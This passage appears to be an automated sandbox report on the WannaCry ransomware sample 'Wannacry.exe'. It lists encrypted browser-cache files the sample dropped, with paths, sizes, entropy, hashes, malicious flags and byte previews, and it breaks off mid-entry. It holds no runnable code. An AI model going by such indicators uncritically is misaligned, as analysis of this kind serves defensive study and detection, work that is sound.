Preview:	WANACRY!.....PW...%..$$..z.xQa.........9j...'.\|}.........:^..8_.-..1\|..e{..A...n.k[.tz..E.......w..h.y..FI..(e..6.`+...,..(.'.....K.yD.)P..B2.[......r.E.S.F.G.DC.....z).F....}1K0Px.'....].Z$^.Z^...V...-...!.F<."'H)V.xS..A.a.....T.V..3%;...l!`.R2..~...i....@Z.......F.`^y.B.;kb....../...t1..b...S.6.4...GVay.>.../~`..=0..X..O3h......x,.-r.-..m...Og`.e...!......(....;.:.Y.e..c..}n9CF.>.6 ...x8`"i....0i..D.W..w\....k=u......w...c.TM.....?....4...9...]&..o.U.8.'.=k.kLl$.;.2@.f.....y.2.iv.M3...M..,.@..FR2..<2.~0.X....4(R.<y7....Z....D.....Zq..kZ.q..z......vcf......e....6e.'].(fr....`...\|/.."..vfa..."K!.W...F.H:......l......P....g..%.s.<.yM5..L..w.(.-b....u%?$..Q...#..~..4.....c.n.@."......E..n.lH..EXJ..H.~h...k..............e....&.Mi.p.B....v?.U...".v.w<g..].[bK.CY>...n...E.B.>...4.6..&P.Z.m..SG.L...........q.c\|e.A....;.......n....!+ke...I.a..].......y...1..=(...bXU.o.2...>.p......B..j.....P,x.9.wY....@Q..g.f...d1.{..%w.......:8=..=.I.....2.2^.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.133807876057012
Encrypted:	false
SSDEEP:	6:bkEa74wB4Y2Gc587H3xLD6G9U4xyBvK6srCEQcUqCaw2:bkEa74M8GHhA4xwC6oihaw2
MD5:	82C0EEF98E0E609E8A8EA7E1AFBCCD33
SHA1:	C78F7540E7FDC59B2E0E2CA6FB8F8E8F5764CC41
SHA-256:	37CADBC22DAFD6F9BF4E229ECB16BD8AEF4F9C1AC77822993018BA1B1B56E847
SHA-512:	BD1ECCD664118C63F5DB8007424ACF3CA263A5BE9C9E96FE520E805183A221626B83AD42B23B811B896738B6ACD2521FF91980DF59A9BE489B005D9EFF8BE9D0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....._l]..].!...2...q;K.M@.....`....../]....F.=..H.. .~".....Z.2)F2..n..U.K.B...4I...........y.L...l.Qh\J.......m.....5.jk...Cw....G.EQV1...3....}....oE.l.....kI.....6.F(.FR1W.....Q.......9.I..).mG....S.".+....2...$..$.....@.'....]....DU..c^.............P.n.YP.].lX]..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\DKghZTJFTUtTng-U_kYAAUcNxRU.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	57496
Entropy (8bit):	7.9967585266336325
Encrypted:	true
SSDEEP:	1536:TOpmyIVeXR3lsHCpjLzaFFuNWtFdYrKtr:TtMh3lsHCRzyFxxYQr
MD5:	5C9AE2EAC5060906EA8FA9DCA4057C06
SHA1:	68FCA4532C4DD88402194769151B5079E6EC950C
SHA-256:	EF143D4A5C099EF15D96BE308768FC9FEC05C8F1F7B370C3300EFE5DA3C5702E
SHA-512:	A9E8F4C3862BCC5495C874603FEE88063F43D64D151CBDBE09BF31722B1FAE5A49897F6FC5E9778D8F22883582D8DF8A309AA2343F8FBBBACC8F28727131FC82
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....q...WV.....u.C.tC...t.`BX4...M...C.....C...<.a.I8.mr}.+X..Z$.2.....^...+u.....2.`..cLK.<574X.....H....l...T.HW..-ncZ.z...P.;.I.`....X.......Z....j./f...!d7.c.&....g.,...U....v."......e....\|..M.....+...!F..7..E5.<.....}.y@\K.:o....4..%...+...r....t........7..k...tb......3.../+......b......5^... .....A...J..'g..-a.....'..........1=...H(.W..4..n.u..TOh.im.2zY..n.....{......r..Z.N..-hQ..._G....i..../nw`...n.c.Grh.d!c..aK.....>T.dFa.%^...c..~5....c.HUi......ts....n...Y0.Fj`..]K....."2k......u5...ie.D...f..)..:.?.....D.-....j.(....O...)Y....h0+z.....\|....P..x....)R.....q.......B..V....M.=.j..0.....>Kbz...w3.s...;.ZEF..%Yd...A.0@$.Px@.8:>7Q..d5q......\...bX..0.........31...4.>..G..B..dko...F..9...XzL.4(...AW.Gj@~zwtyS6<h....>..............8..1.Q0.!XF...xKI.:.7O.6..}.zw....Cmr1x..J..#..I.>R..m.....7.1"q.....e...\QHY...R......S.....D.\|[.B..>....A.S..-..?..........1.T...y...I..P...O.~..NJ..0D.u....]..Ulx).....V......C.U...~..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	131672
Entropy (8bit):	7.998573449919034
Encrypted:	true
SSDEEP:	3072:BSVPdsBA3N4fq1dDW8kN+8pKnZrKcZKfqtjDc7uSFn02PSM:UVdMq0qLDW1qd5kf61SuiSM
MD5:	0E390DB88B5D20B1EA32DDE5C65878D7
SHA1:	D9E5D222C892DFD181E9549434155B5173D63B4A
SHA-256:	ADB240CF2F5572DCB81D51F8DADF8B74D1161800DBC088266F300B0F668754F5
SHA-512:	B97B6565BE79E007A812AA666DE9EB41705C72FAD39667587239FA460343A042032837C70104F8C93749AB77E39B4925373DA4E758F35F4F4537BF08AB08C33C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....e<...U.U...4.B..~.6...!.B.L...]....\|:.].......T[`Iyt...Y..h6.c.a.`P.}...y%iu..o(4...l.v.r.....<.......m.V...TE.....7....b62U.e=k.....D..h.....z...p.......F..s.(-..Rp)l..-...N4... l..Oe...J.....7..].&...R..G..1.?...=....Do....y....._....<.........}$.u....!b7..U".7...:[s.. Q..tR.......!..5`.+.\|.br#.5T..A,.rI....k.Z.a..&.z.....D?mL.B3.'U.....6.Ap`.JhK..Q.8.....m`.B..f..P.......l.w..8)..Sd....sI....ko...,....<......7.U!...E.5..#.0.[....>.g+."v.....AD.@.Y.T.-...Q.[6.4..B..k..ze.\T..,...#.~q.G..^..,.V.hz.6...m<...]..F....-.....WXm<..J.....M.0.....g..3...P.M.[,dl.\..Qa....p...o.......>(...Q\|..K.(...b.T`1...].j.t8J.F(..\|>(.1..o.PGjK..5h...GEwL..To.!....M....a..#.0..U&E.:.?.>......s..F...83.C...].L\|........U..'.a!$C..2.r..Y..~Ks.\R.na.C..U..O!.. \|.k.a...8S.....D.rm.A..t0.>d"..Mw.....KR..b..z.mZ....1Q5....\.E.....gXF.l.....$.../Q../....w..>\|.M..;a...&;...f.K.[.1.......R..&$.4....Y..+k..i.....).*./.u..h.7aq.K.wO.......)...)..... Th'

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	17784
Entropy (8bit):	7.98939620583144
Encrypted:	false
SSDEEP:	384:nbkBanu91FHWu5jISkAQ7CUZs9LjgVyQZVxv9R0T8:s/R7Rx7oCUZs9LcYmTAA
MD5:	D1A48C2291081445CBADCD18C9EFC7C2
SHA1:	17EA2930C749E1DB61FD291CFCDB3406070E312E
SHA-256:	F41432D32207B1B130CDED16D9552DF63A610A36ED4AB4848F09C73DE48B8EDF
SHA-512:	57491AEC68BCFF2E5A911F0CF97C4398DD48D6BFEDF9200399F1819B280539F5F8753C7699333F9F884E2F1BAAEE7BF2E35B818C17694709DBAEDC28C3FDD8A9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Bc........Ak.....T`.o..H..o..g..~.d.r.i.`<....<6\.,BP.t;-............H.".Ze.Q..h.$H..2..B...m.....K.?..oj..3.k..{{......k.-.f.w.V.6.....[+....m.8.^...6....X.NL.X..74..`......-....7...i...j.d....4j.....0.....g-d.Rh......o.F..dj..yg`.i.dO..{..W......ZD......9... .....0.3E.-u......I-..vT..\:......./.'c...0{...r....Y........!.q..S..s,(.9...}!..!x/.......g.M.s.@..P...z.~.s...KpU#D....v..............iD.}.W.g....S5{..P.X.k.....d>`...I...=..7.p@.IQ.P.lT.#.e.n~(.+..X%.x.....@P\|...D.G......v..r.?......k.l....!..RW.=...2]..V....n@.....&...H^..q.O......Pc....Y>5..{..!e.>.q..F.....b/...JU..n<.)\.,...%.em...j.h.5#Hi..&.I.O#.v.s.^...lUc..F.Q..!!]d...s..@8dF.F._#-u...'~....+3p...*.......'.-.(..]..XK.}v/..+.M.:.l..M.......@.N...X.k...<p. ..Pll.X.H..J..WQ.F.y..tGf.....c.S@..Ox.lgK........z..+.........A.f2...+U.u....T4O...SZ........&.Fx9....9..[u....;[C..o.(..!.).^.....5..$PNu.e:. .a.h.Pk.U.......gc..........5v.Ip.wOI.p..T../.!....e1C._{..h...h...\|.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\GW3DpE2qmyibnbFrEIzpiD0iGLk.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	7.713222794045374
Encrypted:	false
SSDEEP:	24:bkQiVpCQbC61NY35nZhuUDRwcxfnvV7E1a+w:bkQg2X35nZhuYTnv9
MD5:	74722428DC8A38EFBD44B888EDD0CC3D
SHA1:	CA2C9E3F30F3048EA1721AE453888EA3DE845A0C
SHA-256:	DA19B195AB43FA9AC5049DEB78478F2B585CB6398D80F587C52EBC2AD849D40B
SHA-512:	3FA2467EEE82D6CF039C421AA6094B5CC22DEB209EAF70AF6A92A88871827B3C5A8DC81E6AEDEE42CF322D9AD8D003029E5A7F7585A7DC5EF255748D19C01327
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....rjk..u.Ng.#.GZ....<8.q..\|...biN.~.'.....gd.2.Z.'..(...E......[1.v.)59@...k ..W..}.....c..R.D.y..8.......3=Bru.D..8e.../.....V.V!,..\|..-C6.ki8W.sO.A...?.....H.. .h....?..8..N!N(.f....X.j.Z.X[.<..V^..d.:)....F...;.m.>.da......yW....r.@...................R......./{0.];.....NDk.c#,.Z.$..(.. .x..US......C..TX......4.5.a.Zdq.\..teU%..PD..... .[6....q.c.p.f...e...=....t!.UA..<.8.}sGa.%a.t.....u..S..N-l.:h..t...,$.......1l.,C..S..R.'.z.1..c....~.0.......3...2......U..#f...".h.z.,........^.{.......[..i..Us.X........$....UK8...s.n.h.46:C.........hDF...F^.;.%?..7;0.-W09.z...._~..B"m.u........{..h$!.I.%...y..%.S.:.../.........8..X../.........S....Q.......9"..!..\|...pe.6./^(.M..........!..."x....-?.........7F..o....fo..\|...h

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	467448
Entropy (8bit):	7.9996180894822775
Encrypted:	true
SSDEEP:	12288:16jQfC3E9oskzAaSODD5Udh4CpkVbsxRqLwvpQ3sVcC:1UQfR1+1SeOzBkxWqLwvpGsCC
MD5:	6A61609035317C73E963D4302274E94E
SHA1:	EC8AC5A586176ADF6E5D689B82FEE984A856A8C7
SHA-256:	850AA4107B8ED6CDA5977FB1F8ED1F4272E5B0AC386D628092F1F3D5D303C8AE
SHA-512:	3DC46EA816E85BCE83AB08DB54DA1228A70FAF8AD73AED8C0F565AE5D277FE134B7321CE1205B1F8C0A2C4A8D2B7F437C76DD662EC202310B469C555B56581F3
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....9.z+...F%2.......{.z8D.O..E.8m..[O.X..\|...)@.......L...bL..%...C..6Zw.?@...3}.("iG.4.j.Z,.........1....}.i+....8.M..B)a... .......^.`....;.\|$.hSI..n..:X...[.n%..k....J.o[....%.e.......3.B.g.........}...V.......&..d.O.......)..A.u[.i..g...K.q..... ......6.....\|...k.).XWY%...o.d..A....?D...O...(.E>.\.a.H]..1u./......eLi.eR..^..<E.N].I\|......[j.;...Sy..2.T..lt....h;u j...'........Y o(.W.DD=..t...S.....8....~.@.%~....x..m.73_a.E..(.H8z...c.N.>.0...._.........H..Y.,.....KR....6N....Pc.@....6.u+.....Z.=...../....u;..5.p4..=7.P..yw.".S...uc....sR....v...X.0..M...~..7a...:._0%.K..T^..u.#..GKf.0..qZ..?j.).,n.._.}j.$O....$.RO.^.^....L....C...1...#[L}..+q.D.-..Y..3...AK.e...h..>E.....q....c..l.D.........../.-:k......P_.h..@.1.......0.'...T...e.m0Z.~?./..p.,..d..v..[9..L....s.L.....t..y..@......./.5....,.*..&..y....E...J..u....d.v.......Z...,..../...;(..~&..#.[..,.$B...,.B/...`..t^....e...}..F{.yK..6..;..S-I.....30Q...Y) A.4gR%..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\KzWxoKDHqNy24XFwlA6xWw89_DA.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	9160
Entropy (8bit):	7.9781746815594285
Encrypted:	false
SSDEEP:	192:EARoCgGr0ApMz7TjfzFFoQwP4HRozWwIQIh7lyqva:aCoz7TjLFFoQa4SIQIt5va
MD5:	2E7485B03D759E88F30C6BA579B5106A
SHA1:	3F7DB9B5B4C24C98FDA4CB5A79698BA0CA7A21F6
SHA-256:	0111A66D84AE3488FDDAECD8D23371FCA1F88C6AC3D9709EF4A0A68D79A69915
SHA-512:	658AD3AA3EB5CD248B836E5E08DBD475E1D037C4F8DFE27EC7F0BF6BC0AE61A23DC1602508FA23583A8E7DB4DDDA91EFEE14C06C8991591070FF26DBF0BD3396
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....6..<..o.>.d....e...F.....~n.....so[......N...b..,....{....i...}[\E\|.+.}B....`..3.,Dj..M%,..2....Y.Y...c... .<%{1o....?.n3e....):.....c.&{......H.C. ..!\|..R.GL....).r."..]Im....Zg..7.ULErP..R...h#...2-."....a.Qs.%..\.y..@...N...)....?.g..Ab.....".......`.NY.... ..>l...zG..'..^.....`.0.p.f.1.~..B..c.@..W.N.....Kr.,........K...'n..s.`..v/.o.Ti..U.....Z...QURA@..h..>.....u.3.U..7P.}..;.....T.I..#.n.....E.&.q7.......X'QF8%\5.../..L.........O..G3E.G.;.q..f.3..E.x...,...<<%mR).r.Yh.;....i....=.J^W.n....!O-...$.C..{....5..y...n...[...u7x.+.e3..."9.Z.+.....1j6Af.F...2}eQ.......K....,.\..f!..zm5....S... v........;...."3.-B.`.fT..........m.b.=..9{m..i%.a.?%.@......&*..m.V.....w.G........6..sCZ......O7.......n.T...b...X.HB.%.......$.dH....u<..J.......\|.....N..Z.....}.G...7...\0...g..:.]..<.....Dg. ".....~.g...%(.....H.H.....Le...-+./.d..ad..J....]...A.F.,.%'p>...K....N...HL$_..$.......Q'b.C..G....Xz.^.x..@..k.......3...........

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\LisgCZCwGQ4lRz4go9tlwPslw_k.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16056
Entropy (8bit):	7.9861068525700905
Encrypted:	false
SSDEEP:	384:Vi73jJScBe2mH+MGc6RilJajBJcTuGOnDs0aHT6CcDiVH:ydScBe2mH+7ilCJcGtqYDiVH
MD5:	C6370A4FBBEEB4AC6D60AD91307D3B33
SHA1:	F758E1F6E781DDCDA98300CB85FB5D83DC67507C
SHA-256:	847CC060E3EEBCBBF5C9991C07FFE693C807239F15751E863DA9D81F00B60539
SHA-512:	8A3BE995CC2BDCE62D1591E4103F224704A2F98B8D264B8AF3C0E945F45DF0DC34FE7A254A306AE4002E1D9D731B1C24828739B439A1B5CBC241CE8B41C73910
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........J.......R?..=".bB..Wh..fh6Ito.S.p...,oda....(".l.lP...@.w.:..X..&.r\A....%Z.].%..\i2.<.&..]J...&.."."...j.P............0J..j.vM......v..Y1./..Lv..j.....{#zS.&c>.aC.......J%...A..S...."....}..6..F%.n...XO...{>FtTEE...Q......[."?.O.^....1.b.j.....=......^...d.M...&O.(fk..ka.Z.......[.....]p(Q..G...W./... Q.[..S....H.H.~..9.$....qHM........I"1....,.M+.[8...ho#~..'. WD.H..J..5.}W.&..5..8..G{.b{c:.I.{.4.'....\...>f.;...B......x.`..B...#(...P.BZ..XZ............xr<%.Q.....C-L..?8....fjo..*..#....3.H/\.t.yT.z....jS.O.f..u.......OLV..e..$s9..I......7K..i.^...q..m..s.......<.~C.f.L.(c.E.... .M.A.'..8u.....s.......X=e...2...yy.@K....VC..6......V.....%9)C......w...U.K[...e..}{.l.i-....9.....&..p .......Pd...#....~..C.c.e.i.~-.$...u...{.j_f.W=N_.(s.t...d...M}....M.5.i,U.A......Cs.3.....r.9..G]Bt..X2...:8._..3.....aM......YA.J>...t..jY.I.s.x>.....y.i.+UHn."..D.....y..vl......D.k.,...A.:i...._>.\).\|.V&.%.o4..I7.......3}......y8`.yG.@...a.VSE

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	105400
Entropy (8bit):	7.99834713562785
Encrypted:	true
SSDEEP:	1536:5Ct1rDYogQq1XROhnPu6JelQLuPUnxBPRp3xBHTLQwOLOSYqKvDrGhrUiITVL1S:5CTrtgQmCnPzJewnxBPRzdaLO/IrUBZ8
MD5:	8EB58874580DAA30BE65A3C798271676
SHA1:	F32CA7BCD1B7510B94FC658980550DF2C5B1E765
SHA-256:	B84521E27B68DA7C25A731ADDCE68B91891E618FB32DA4EBA184A10D33E16046
SHA-512:	2B9F48B4609EF0E3FEBA6FAA21F89BE5CCA147D1FAB3A36CDB1513650EDF09D5461D1255749BA1D5E9A9D4E5A47A1BB34C799C7F59D26F3DFCCE442F7768AA18
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......J..4.H?.G.N1.P.T.zi.......?\o....Q.....Rf.K{4E..\|2~..w..V...$.A.5.W..>r0UU..4.\|......Ex..0.X'_...#...D.&....M[..T....X...f!......G.\..+.Ud.9d...g6._.."...R'gwn.#..=.....z55.<".a.~.YT0..c....h4....+!].i.nV+..(..F...6..a..#U.z.E.W}..n.....!a..............f........].q...2.....<...d.W..O...\..&w...jl.m.}(.?\x.3>oh...."...j..P.;L.Ir{P7...j..r........s[.U\|.5....... .F.G0i.}yiZ.u..9...e.Z.-U>.b..\|..$OU..a._-...Z....a...e}...../.z...ilp....~t?.... d8.......9Z.u.tR.....{0.......z /<..z.dV.......z..`s..N6t.4D.....um..Av..D...Q..?.b..2.q:....6...Vv........_..x...n1.4.R.%.Bd.1....W..+Z.g.t.R..?.T..S.s.`..[+.6...FT.Y....mW<F....ge..a\..r7.B.Ef.TS`.C..7..3.....2#7......$Gq\....l...T...L6./.KPs..oo/.....}.9.............[.C.m......)..e:E.bUO..cs.U#...q~0......v.j. .H.... ..............)-I....l....o...E..B\j.."S...".{98UL..@8.F.r2.\t.O,I..w.Eg.:..M..G%q.^..c.....m..:h1gNjP......wf....f...k......+.Uq...s..c{.:A.1Z...3.....QrFc.M[@.N

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\NgBYMKYCFbLUht0w_dWiWEc8_84.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1716824
Entropy (8bit):	7.999888685430151
Encrypted:	true
SSDEEP:	49152:9I9pqTYiI3+/lKFChtrD3tXAWNZ8sb/eJSv47:qpqkLyAkVusb/e4v47
MD5:	C6A360AD98B546CAE016D54160C8A19D
SHA1:	14DB50D8B33477C51DB5DAE2BEDE349FE8574CCA
SHA-256:	0017AEBF7B49FB3EC67A3D95F3BDABC9AD43442934A48B43B73E414FBA81DAB5
SHA-512:	B0A2EBBE0EF325E2438B63D4A769947F8F986E3DDEF444052B9AA64B3EA0F0726B9D9A2C9E800081EA9084A327EB2A8AA2BE6EDD1EEC2048B29B8720D4A338F3
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......R..D.-..........t.g........./m;Sk.Fx.....P=.....rIW......k...k.R....h......N......nK..TU.&.G&.....9S``;.......,...Tc........d.C.+..E...O .s8.8g.5.v....\U.y.P.F........Q.Y...A..[}Y.W..2m(..k.E.]uc.K^.(..U#....q..>_.q..\T.x..>J..M..c.7p.oQ.......71.........2./..CV...%...@...v..T..iP.D.S.oCj...P..}'... ..pgi../UGz>.!..h.B...3......J....~...hj_2.5...S..r..CJ..\.....W.'20..^..@.....{..\.F......m.xe........E...G=58....Y.$.I....2..J;..X.....[...'.e.x`@......_hHo!..N.U}...g2=".d..-=..+x3....N...Wn.oi<..oc.4h.Pp.0..x....i.9...j%....hM....f..8a.oZ.#.h`:a~..%@xUCl.Wy...{..\|.......kz..iR../.+..........V.\..........ht...#......6....9.'T.d+K.40t....Y.D....)]...T..g..0.M..E.......K.t.J@..h`.$K..N.=..z.$'$...}@2C.[>.d.g............K.]}p...;9EH.....#..e.D.:.X.\|,.HH..26.....S.O.J..m=.Y.........V]....m.;.G..VYo..S.e.S.Bz....wsKF..-.U.x.]g.y.....e&....k.Nb.Z.-..pP.G.)..P:.....[......1...I...m.....4...d.U...^.sh.....W.....].....q.!....Ga..M..YI.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\PQCyhptPfH1wsxCPe25Yu3FheVw.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	14760
Entropy (8bit):	7.986198296417357
Encrypted:	false
SSDEEP:	384:R06tNimBE4pZnTXJi0TU0FFMat6NWkb0aCwN4y:RPtNLBEGDJi0TU0F/UxL
MD5:	F879231652CE21B2826EE35952454AC0
SHA1:	1A9EBD2CE41708FFBDEC883BD64C44FF3BA8C12B
SHA-256:	A947DDAED53BE3F628C17410AB9AE2966AA976A5D0BFC67F583D78CAE6A875FB
SHA-512:	47A59686F008DF7B219800DADBA5E7232702AA3AAC6CCE7254518DFAE610FF05658F856826A6E66E33A2A988CD5CBAEE0E4AF6AA4537D9C061A9F3A779422BB3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....@@..4t...{o@..4.[...!d\G..\|b.q......&.?].A..SY.!-..@.G.....[.p..C..^ZXJ.~.=.7sKN.C.C..TN.`...D-/Z/.n..w.T........E6j.....l.N.?>.......>@.,\...........Vs....N.........&d..(......w.......( ......0.0uK..?......q..8........j..t..x..7.~.."....p.Y..`...D.....8......&A.(.......N#.....zw...l..j../.[j.Ox%..O.aa...{3h.PV.mN.\................d....oX...yIq`..>.&b.`y...rqDf...........V.B..e/7#.5zB.Fu..P.+8}.2h.. .W.....x....e.".21%.p.Tv.5. U5..=.W.B.m...s2p<.g....e....y.......k...../..u"EF.W.,.7...rg.S...q...O...2wx.....4<...IzM<.C..dG_..$L.5...J....^...)..4.{~.d.1..n^[q.)Z<.....zd.-G...Z..O.,~....'...z6..}.1.q...q.=....m...#.2gq.d...~3.p\..R....[U.#.]....A<..#..(......8...q.X..Y...h.......g.....o0.Y..aVtW.x..+.8j._..5GA..J.u.rx..h.Q...&.......=... ........N.r..'3T..34..6G.8j....E..T.E.'...jI...3m.....x.....r.....bmf..L..S7U... ...1..g8..]%...9....~.z...L.A/S.V..tA.uT.N.c.g..ws.E.\7..{.p..>....\LC.l..Xw....t..O.r.rhM.-I.O.{+G.....wRS...l...J.{..?>...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3160
Entropy (8bit):	7.927455999354524
Encrypted:	false
SSDEEP:	96:oahF/4ZuJG7IAxJ6dOTM8Ej04D2WJzqUQgsGnavIBIKMyR:XhasJGEokOTM9PRJ2FGLrP
MD5:	74B7B5626152209ADBE44308952E3EC6
SHA1:	A55A20E62F10A0FE897D8DAE114422BE8145D1FB
SHA-256:	6ED14DEABD4E8480D8D70BBAA3820CF413A24629982CBB3BB62B303DB8B1B12B
SHA-512:	4A8A1E375572016CD2EEFBAC54313DBB16F0F06EA7B8E704409E0399BD504656BED1F8EBE1238F9BAC0A614763C97C1650FFF17647EA0EE0B934D9C4CB394815
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Y=......t.N.l...j.$.3{...8..]..........-..4...m\|p..0..4....h..?.S..R8.,M.x..](..Oi..H.~d.....h....yG(.V.<.G..WYo.=l.gn..?.E...1......m;.5.BM..r@.G.......K...C.).sc.HRD...B(%.+sL.N=o..sA6....l;0...A...w1..6y..y.FxXS..jiL#..@.r....jO.,..N.#.k.O..,....3.........o...\|......,3%$%x.y?..u.$N5.....9....R.uB.Q..__..jw..."b....+... -EOj2....WIh=..r0.n....=.!...........!>/..v..U5.%X\|...J.$\|"..mH.2>......8J..f..g...\......U. ...RJ.[....}Y......j....R[....]...p......O....j.aP.....E.r.:.T..F..^.9.ju.\[.9.?o.:.VY..3.u.j..c-"..{.../.....GN.s.WI9.}.}...=.....c.uA$_...p........wo#.G.....N.\|I.YW."{...TO.S[....Kz..:.....7.'...!s...(C..m.Bt.O.m..qJ]c50..B..g...B..N..B.....7<UJ..C..R..k.......j~..X.#(........>.Av..F6'....r..... .e..2R..l.......nxv....@E.O...y\|..g....._..K,7......FR...b.\|....XS.7.%..<..>.Y0.%.ou)\.]..C5..\wQ.Q.&.,..V.r4..O..)..09.....IId.q.B.....V<H.<...w...D..Y..A....I(E!.?G.@.V....k0Y..9..`....\......C.. ..a..hF>......P.g.m.4.u>...6...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\Uqk2UlA-OBSXvX7_-n-Jo9zPFIk.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	342456
Entropy (8bit):	7.999449281238756
Encrypted:	true
SSDEEP:	6144:4Md8AahUhLN4vZZZD0Ce17O9NvQACHSAqVEtq1U+kN4lygb/guNDMON5GwnVvYZ:4MpahUhKhZ6H49UPqVE9+k2dbguNdjtS
MD5:	B6571C0B535C67F159FF6E9D4EFD7A51
SHA1:	E641B964D68ADA94629D8BC79979A23560B2C213
SHA-256:	E6E621E85A4F82BFA1B446A8F0184CA621BB9CB616CB3D8BCA69B04FCFB3B82C
SHA-512:	C4650DF1B420A5D0F2796AA43F4480DB2673449C099C9E0350257403EB2B4C04AFEE86449B1F18D2C9839E3FE60AEE0732E01560F07E0864677C6711832B24F9
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....... /.hB.%...S.J....W......k.y.....P.....k..0HQ.6.#j.....:Z=....r..V.......m.....V..`..l..}..{..,...DJ.H.%.py..BS.S.+..>r..%.H....L#...%.........L.m..H1....9.[\.I.....tu..Q.S...:3.$..T.d..`.\|q.r].7..RI....PkV.1..3$0..F.).'.;..=\vn...e.........8........8......hH.....1..p....p...3..N^y..k.kx.`.sc.]yZyQ.Im....C.:...j...1./...=...I....X...0.x..R...pa.....U.......:>...>.'Q.&....anc......Fs....dyM..(...{.U6..,-AuP.......!...=...&.!....:..l....,..,C..Xa...n.xQ.HV..."(s..Z...a....R...ae.U?7..Hr?.5.S...&.........0..V...nV.;....)s4\|..t.k....h........K#.....'..'}.R.A....c..6...Oy....`..FoU.;.....`3...P..E.0t ..L=.v..!.1Y_......p.....3`X.7]o.........d.5.{....LEp..w.#.M.Sh.. lb[.y.../..0.Z1L...5.x.i.h.RR..F..<..\|g..h.%.g..U...f.5B.......f5.....)eu.p.HY.......FT.[.:.....A[..h-.]@i.,..<...g..._.Z....w..L..D.b..M.;@P....^.uQ...S..E.i..)].>X".?. ...mi.9Y.:...D.......x)..r.K.E..F...~S..V{6.6.........9.i.-..Y...m..v.~...Z .9\...V...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\VgwE8jbzHb04_mL1BsFSbJTzUTk.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	44552
Entropy (8bit):	7.995866253165443
Encrypted:	true
SSDEEP:	768:YKdugQaqWSm+KIJrdgYb2/mzeGF0W/UmqepKD3ZVr8NcoBhTLxNzml8WQ6Nf+hx:XYdWSYIjG+KGF0tD3X8ZhTLmlxQ61Yx
MD5:	D3D3A766B873104BA15D986C4E6FA9A7
